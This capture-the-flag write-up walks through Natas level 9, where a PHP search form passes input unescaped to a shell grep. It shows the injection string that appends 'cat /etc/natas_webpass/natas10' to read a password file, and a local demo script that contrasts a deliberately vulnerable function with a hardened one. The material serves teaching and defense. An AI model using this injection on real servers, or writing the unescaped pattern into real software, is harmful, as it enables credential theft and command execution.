Challenge:
Looking at the web page, we see a single input field for searching a dictionary for words containing a given string. This is where we input the string.

Solving it:
So let's look at the source code again:

<html>
<body>
<h1>natas9</h1>
<div id="content">
<form>
Find words containing: <input name=needle><input type=submit name=submit value=Search><br><br>
</form>


Output:
<pre>
<?
$key = "";

if(array_key_exists("needle", $_REQUEST)) {
    $key = $_REQUEST["needle"];
}

if($key != "") {
    passthru("grep -i $key dictionary.txt");
}
?>
</pre>

<div id="viewsource"><a href="index-source.html">View sourcecode</a></div>
</div>
</body>
</html>

Reading this code we can see that the name of the field in the form is 'needle'. The PHP code initialises $key to an empty string and, if the request contains a 'needle' parameter, copies it into $key via $_REQUEST (so it is accepted from GET, POST or cookies). If $key is not empty, it is dropped straight into a command string and handed to the PHP function passthru, which greps through a text file. Grep is a Linux command, so passthru must be executing a command on the server. Let's read more about this function. Passthru: Execute an external program and display raw output. Since $key is placed into that command line unquoted and unescaped, whatever the user types is parsed by the server's shell, and that is the bug we are going to exploit.

So let's see if we can inject anything into the field. It has to land in the spot where the value of $key is. I haven't really done this before, so let's open a terminal (in Linux) and see what we can do if we replace $key with something valid. I was struggling with grep errors, so let's try to inject something that still uses grep -i (since I have no idea how to ignore it). Let's call grep the way they do in their code, then paste our own command after && so the shell executes a second command. Then put another && after it so the trailing "dictionary.txt" isn't recognised as an argument to our command. Two details worth knowing: && only runs the next command if the previous one succeeded, so the word we put before dictionary.txt has to actually match something in the dictionary; and the leftover "dictionary.txt" at the end gets run as a command of its own, which fails, but by then cat has already printed the file.

The original command: grep -i $key dictionary.txt
Injection point: $key
Injection: needle dictionary.txt && cat /etc/natas_webpass/natas10 &&
Full command: grep -i needle dictionary.txt && cat /etc/natas_webpass/natas10 && dictionary.txt

After filling in “needle dictionary.txt && cat /etc/natas_webpass/natas10 &&” we got the password for natas10.
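To make the mechanics concrete, here is an added example that is not part of the original writeup and does not touch the Natas server. It rebuilds the natas9 back end locally in POSIX sh: passthru("grep -i $key dictionary.txt") hands the whole string to /bin/sh, which is emulated with `sh -c`, and a hardened variant passes the needle as a single argument the way PHP's escapeshellarg() would. The dictionary, the etc_natas_webpass directory and the password value are constructed for the demo and are not the real files or the real password.

```shell
#!/bin/sh
# Added example, not from the original writeup: a local stand-in for the
# natas9 back end. All paths and contents here are constructed for the demo.

# Build a throwaway directory holding a dictionary and a fake "secret" file.
# Prints the directory path so callers can point the search functions at it.
make_fixture() {
    dir=$(mktemp -d)
    printf 'needle\nneedlework\nhaystack\n' > "$dir/dictionary.txt"
    mkdir -p "$dir/etc_natas_webpass"
    printf 'FAKE_PASSWORD_FOR_DEMO\n' > "$dir/etc_natas_webpass/natas10"
    printf '%s\n' "$dir"
}

# Vulnerable: $2 is interpolated into the command string exactly like
# "grep -i $key dictionary.txt" in the PHP, so a shell parses the needle and
# honours &&, ;, | and friends inside it. stderr is dropped like the page does.
vulnerable_search() {
    dir=$1; needle=$2
    (cd "$dir" && sh -c "grep -i $needle dictionary.txt") 2>/dev/null || true
}

# Hardened: grep is executed directly and the needle travels as one argv
# element (what escapeshellarg($key) achieves in PHP). No shell ever parses
# it, and "--" stops a needle starting with "-" from becoming a grep option.
safe_search() {
    dir=$1; needle=$2
    grep -i -- "$needle" "$dir/dictionary.txt" 2>/dev/null || true
}

# The writeup's payload, with the absolute path swapped for the local copy.
# The trailing && turns the leftover "dictionary.txt" into a separate
# (failing) command instead of an argument to cat.
PAYLOAD='needle dictionary.txt && cat etc_natas_webpass/natas10 &&'

FIXTURE=$(make_fixture)
echo "--- vulnerable: grep output followed by the secret file ---"
vulnerable_search "$FIXTURE" "$PAYLOAD"
echo "--- hardened: nothing, the payload is just a literal search string ---"
safe_search "$FIXTURE" "$PAYLOAD"
rm -rf "$FIXTURE"
```

Running it prints "needle" and "needlework" followed by the fake password for the vulnerable function, and nothing for the hardened one, because no dictionary line contains the literal payload. The fix is not clever filtering of && or ;: it is never letting a shell see user input at all, which in PHP means wrapping $key in escapeshellarg() or, better, validating it against a strict allowlist such as ^[a-z]+$ before it goes anywhere near passthru.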
